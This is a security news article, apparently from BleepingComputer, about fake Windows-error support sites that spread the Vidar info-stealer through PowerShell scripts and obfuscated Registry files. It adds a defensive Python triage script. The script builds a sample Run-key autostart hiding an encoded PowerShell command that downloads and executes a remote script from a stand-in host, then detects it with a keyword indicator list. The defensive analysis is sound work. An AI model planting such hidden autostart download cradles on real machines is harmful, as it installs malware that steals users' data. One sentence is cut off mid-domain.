First discovered by eSentire's Threat Response Unit, the fake support sites are promoted through YouTube channels that have been compromised and hijacked, so the videos appear to come from an established content creator and gain legitimacy.
In particular, the threat actors are creating fake videos promoting a fix for the 0x80070643 error that millions of Windows users have been dealing with since January.
After installing the update, Windows users worldwide reported receiving '0x80070643 - ERROR_INSTALL_FAILURE' when attempting to install the update, which would not go away no matter how hard they tried.
It turns out that Windows Update is displaying an incorrect error message, as it was supposed to display a CBS_E_INSUFFICIENT_DISK_SPACE error on systems with a Windows Recovery Environment partition that's too small for the update to install.
Due to this, many are unable to install the security update and are left with the 0x80070643 error message every time they use Windows Update.
These errors have caused many frustrated Windows users to seek a solution online, allowing threat actors to capitalize on their search for a fix.
According to eSentire, threat actors are creating numerous fake IT support sites that are specifically designed to help users with common Windows errors, heavily focusing on the 0x80070643 error.
The researchers found two fake IT support sites promoted on YouTube named pchelprwizzards[.
Like the other videos eSentire found for the PCHelperWizard typo sites, BleepingComputer also found YouTube videos for the FixedGuides site, also promoting fixes for the 0x80070643 errors.
These sites all offer fixes that either require you to copy and run a PowerShell script or import the contents of a Windows Registry file.
eSentire's report outlines how the PCHelperWizard sites walk users through copying a PowerShell script into the Windows Clipboard and executing it in a PowerShell prompt.
This PowerShell script contains a Base64 encoded script that will connect to a remote server to download another PowerShell script, which installs the Vidar information-stealing malware on the device.
The FixedGuides site does it a bit differently, using an obfuscated Windows Registry file to hide autostarts that launch a malicious PowerShell script.
When I extracted the strings from the above file, you can see that it contains a valid Registry file that adds a Windows autostart entry that runs a PowerShell script.
Using either fake fix will result in the information-stealing malware launching after Windows is restarted.
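To show what the Registry-file variant described above looks like from a defender's side, here is an added triage script written for this article, not code from eSentire's report or from the fake support sites: it parses a constructed .reg sample, decodes hex-encoded Run-key values and the Base64 payload behind PowerShell's -EncodedCommand, and flags the download-cradle indicators a responder would look for. The sample file, the value names and the example.invalid URL are all constructed assumptions.

```python
import base64
import re

RUN_KEY_RE = re.compile(r'\\CurrentVersion\\(Run|RunOnce)\]$', re.I)
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"=(?P<data>.*)$')
INDICATORS = ('-enc', '-encodedcommand', '-w hidden', 'bypass', 'iex', 'invoke-expression', 'downloadstring', 'downloadfile')

def build_sample_reg():
    """Constructed sample (not the article's file): one benign Run entry plus a hex(2)
    REG_EXPAND_SZ entry hiding a PowerShell command with a Base64 stage-two download."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')"
    enc = base64.b64encode(stage2.encode('utf-16le')).decode()
    cmd = f'powershell -w hidden -enc {enc}'
    parts = [f'{b:02x}' for b in cmd.encode('utf-16le') + b'\x00\x00']
    # regedit wraps long hex data over several lines with a trailing backslash
    wrapped = ',\\\n  '.join(','.join(parts[i:i + 24]) for i in range(0, len(parts), 24))
    return ('Windows Registry Editor Version 5.00\n\n'
            '[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n'
            '"OneDrive"="\\"C:\\\\Users\\\\user\\\\OneDrive.exe\\" /background"\n'
            f'"WindowsUpdateFix"=hex(2):{wrapped}\n')

def decode_value(data):  # .reg value data: quoted string, or hex/hex(2) UTF-16LE bytes
    if data.startswith(('hex:', 'hex(2):')):
        raw = bytes.fromhex(data.split(':', 1)[1].replace(',', ''))
        return raw.decode('utf-16le', errors='ignore').rstrip('\x00')
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return data

def decode_encoded_command(cmd):  # script behind -e/-ec/-enc/-EncodedCommand (Base64 of UTF-16LE)
    m = re.search(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', cmd, re.I)
    return base64.b64decode(m.group(1)).decode('utf-16le', errors='ignore') if m else None

def analyze_reg(text):  # Run/RunOnce autostart entries whose command looks like a PowerShell loader
    findings, key = [], None
    for line in re.sub(r'\\\r?\n\s*', '', text).splitlines():  # join continuation lines first
        line = line.strip()
        if line.startswith('['):
            key = line
            continue
        m = VALUE_RE.match(line)
        if not m or key is None or not RUN_KEY_RE.search(key):
            continue
        cmd = decode_value(m.group('data'))
        decoded = decode_encoded_command(cmd)
        visible = re.sub(r'[A-Za-z0-9+/=]{40,}', '', cmd)  # ignore the Base64 blob itself
        hits = sorted(i for i in INDICATORS if i in (visible + ' ' + (decoded or '')).lower())
        if hits:
            findings.append({'key': key, 'value': m.group('name'), 'command': cmd,
                             'decoded': decoded, 'indicators': hits})
    return findings
```

Running analyze_reg(build_sample_reg()) flags only the WindowsUpdateFix entry and returns its decoded stage-two command alongside the matched indicators; the same parser can be pointed at a real .reg file before anyone imports it.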
While Windows errors can be annoying, it is crucial to download software and fixes only from trusted websites, not from random videos and websites with little or no reputation.
As for the 0x80070643 errors, if you are unable to resize the WinRE partition, your best bet is to use Microsoft's Show or Hide Tool to hide the KB5034441 update so that Windows Update no longer offers it on your system, rather than searching the Internet for a magic fix.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Sun, 30 Jun 2024 14:35:28 +0000